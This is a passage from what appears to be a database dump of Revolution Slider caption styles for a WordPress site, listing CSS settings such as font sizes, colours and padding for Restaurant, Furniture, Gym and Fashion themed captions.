255)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(38,'.tp-caption.mediumlarge_light_white','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":[],\"hover\":\"\"}','{\"font-size\":\"34px\",\"line-height\":\"40px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(39,'.tp-caption.mediumlarge_light_white_center','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":[],\"hover\":\"\"}','{\"font-size\":\"34px\",\"line-height\":\"40px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"#ffffff\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px 0px 0px 0px\",\"text-align\":\"center\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(40,'.tp-caption.medium_bg_asbestos','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":[],\"hover\":\"\"}','{\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"rgb(127, 140, 141)\",\"padding\":\"10px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(41,'.tp-caption.medium_light_black','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":[],\"hover\":\"\"}','{\"font-size\":\"30px\",\"line-height\":\"36px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(0, 0, 0)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(42,'.tp-caption.large_bold_black','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":[],\"hover\":\"\"}','{\"font-size\":\"58px\",\"line-height\":\"60px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(0, 0, 0)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(43,'.tp-caption.mediumlarge_light_darkblue','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":[],\"hover\":\"\"}','{\"font-size\":\"34px\",\"line-height\":\"40px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(52, 73, 94)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(44,'.tp-caption.small_light_white','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":[],\"hover\":\"\"}','{\"font-size\":\"17px\",\"line-height\":\"28px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(45,'.tp-caption.roundedimage','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":[],\"hover\":\"\"}','{\"border-width\":\"0px\",\"border-color\":\"rgb(34, 34, 34)\",\"border-style\":\"none\"}'),(46,'.tp-caption.large_bg_black','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":[],\"hover\":\"\"}','{\"font-size\":\"40px\",\"line-height\":\"40px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"rgb(0, 0, 0)\",\"padding\":\"10px 20px 15px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(47,'.tp-caption.mediumwhitebg','{\"translated\":5,\"type\":\"text\",\"version\":\"4\"}','null','{\"idle\":{\"text-shadow\":\"none\"},\"hover\":\"\"}','{\"font-size\":\"30px\",\"line-height\":\"30px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(0, 0, 0)\",\"text-decoration\":\"none\",\"background-color\":\"rgb(255, 255, 255)\",\"padding\":\"5px 15px 10px\",\"border-width\":\"0px\",\"border-color\":\"rgb(0, 0, 0)\",\"border-style\":\"none\"}'),(48,'.tp-caption.MarkerDisplay','{\"translated\":5,\"type\":\"text\",\"version\":\"5.0\"}','{\"color\":\"#ff0000\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\"}','{\"idle\":{\"text-shadow\":\"none\"},\"hover\":\"\"}','{\"font-style\":\"normal\",\"font-family\":\"Permanent Marker\",\"padding\":\"0px 0px 0px 0px\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"#000000\",\"border-style\":\"none\",\"border-width\":\"0px\",\"border-radius\":\"0px 0px 0px 0px\",\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(49,'.tp-caption.Restaurant-Display','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\"}','{\"idle\":\"\",\"hover\":\"\"}','{\"color\":\"#ffffff\",\"font-size\":\"120px\",\"line-height\":\"120px\",\"font-weight\":\"700\",\"font-style\":\"normal\",\"font-family\":\"Roboto\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(50,'.tp-caption.Restaurant-Cursive','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\"}','{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"font-size\":\"30px\",\"line-height\":\"30px\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"Nothing you could do\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(51,'.tp-caption.Restaurant-ScrollDownText','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\"}','{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"font-size\":\"17px\",\"line-height\":\"17px\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"Roboto\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(52,'.tp-caption.Restaurant-Description','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\"}','{\"idle\":{\"letter-spacing\":\"3px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"font-size\":\"20px\",\"line-height\":\"30px\",\"font-weight\":\"300\",\"font-style\":\"normal\",\"font-family\":\"Roboto\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(53,'.tp-caption.Restaurant-Price','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\"}','{\"idle\":{\"letter-spacing\":\"3px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"font-size\":\"30px\",\"line-height\":\"30px\",\"font-weight\":\"300\",\"font-style\":\"normal\",\"font-family\":\"Roboto\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(54,'.tp-caption.Restaurant-Menuitem','{\"hover\":\"false\",\"type\":\"text\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#000000\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#ffffff\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"pointer\",\"speed\":\"500\",\"easing\":\"power2.inOut\"}','{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"17px\",\"line-height\":\"17px\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"Roboto\",\"padding\":[\"10px\",\"30px\",\"10px\",\"30px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#000000\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),(55,'.tp-caption.Furniture-LogoText','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":{\"text-shadow\":\"none\"},\"hover\":\"\"}','{\"color\":\"#e6cfa3\",\"color-transparency\":\"1\",\"font-size\":\"160px\",\"line-height\":\"150px\",\"font-weight\":\"300\",\"font-style\":\"normal\",\"font-family\":\"\\\"Raleway\\\"\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(56,'.tp-caption.Furniture-Plus','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"30px\",\"30px\",\"30px\",\"30px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0.5\",\"easing\":\"none\"}','{\"idle\":{\"text-shadow\":\"none\",\"box-shadow\":\"rgba(0,0,0,0.1) 0 1px 3px\"},\"hover\":\"\"}','{\"color\":\"#e6cfa3\",\"color-transparency\":\"1\",\"font-size\":\"20\",\"line-height\":\"20px\",\"font-weight\":\"400\",\"font-style\":\"normal\",\"font-family\":\"\\\"Raleway\\\"\",\"padding\":[\"6px\",\"7px\",\"4px\",\"7px\"],\"text-decoration\":\"none\",\"background-color\":\"#ffffff\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"30px\",\"30px\",\"30px\",\"30px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(57,'.tp-caption.Furniture-Title','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":{\"text-shadow\":\"none\",\"letter-spacing\":\"3px\"},\"hover\":\"\"}','{\"color\":\"#000000\",\"color-transparency\":\"1\",\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-weight\":\"700\",\"font-style\":\"normal\",\"font-family\":\"\\\"Raleway\\\"\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(58,'.tp-caption.Furniture-Subtitle','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":{\"text-shadow\":\"none\"},\"hover\":\"\"}','{\"color\":\"#000000\",\"color-transparency\":\"1\",\"font-size\":\"17px\",\"line-height\":\"20px\",\"font-weight\":\"300\",\"font-style\":\"normal\",\"font-family\":\"\\\"Raleway\\\"\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(59,'.tp-caption.Gym-Display','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":\"\",\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"80px\",\"line-height\":\"70px\",\"font-weight\":\"900\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(60,'.tp-caption.Gym-Subline','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":{\"letter-spacing\":\"5px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"30px\",\"line-height\":\"30px\",\"font-weight\":\"100\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(61,'.tp-caption.Gym-SmallText','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":{\"text-shadow\":\"none\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"17px\",\"line-height\":\"22\",\"font-weight\":\"300\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(62,'.tp-caption.Fashion-SmallText','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"12px\",\"line-height\":\"20px\",\"font-weight\":\"600\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(63,'.tp-caption.Fashion-BigDisplay','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}','{\"color\":\"#000000\",\"color-transparency\":\"1\",\"font-size\":\"60px\",\"line-height\":\"60px\",\"font-weight\":\"900\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"1\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\"}'),(64,'.tp-caption.Fashion-TextBlock','{\"hover\":\"false\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"background-transparency\":\"0\",\"border-color\":\"transparent\",\"border-transparency\":\"1\",\"border-style\":\"none\",\"border-width\":\"0\",\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"speed\":\"0\",\"easing\":\"none\"}','{\"idle\":{\"letter-spacing\":\"2px\"},\"hover\":\"\"}','{\"color\":\"#000000\",\"color-transparency\":\